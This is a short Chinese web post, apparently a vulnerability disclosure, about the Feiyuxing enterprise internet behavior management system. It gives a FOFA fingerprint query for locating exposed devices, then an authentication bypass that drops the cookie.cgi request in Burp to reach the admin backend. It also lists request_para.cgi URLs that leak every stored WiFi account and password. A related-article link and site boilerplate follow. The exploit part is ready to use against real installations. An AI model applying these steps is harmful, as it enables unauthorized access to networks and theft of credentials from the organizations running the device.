FoFA
title="飞鱼星企业级智能上网行为管理系统"
访问 http://******/home/index.html,然后用burp抓包drop掉cookie.cgi这个包
越权进入后台
其中还存在敏感信息泄露
/request_para.cgi?parameter=wifi_info #获取ALL WIFI账号密码
/request_para.cgi?parameter=wifi_get_5g_host #获取5GWIFI账号密码
/request_para.cgi?parameter=wifi_get_2g_host #获取2GWIFI账号密码
相关推荐: NT RPC CPU Utilization Vulnerability
NT RPC CPU Utilization Vulnerability 漏洞ID 1105077 漏洞类型 Unknown 发布时间 1997-02-07 更新时间 1997-02-07 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/A CVS…
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论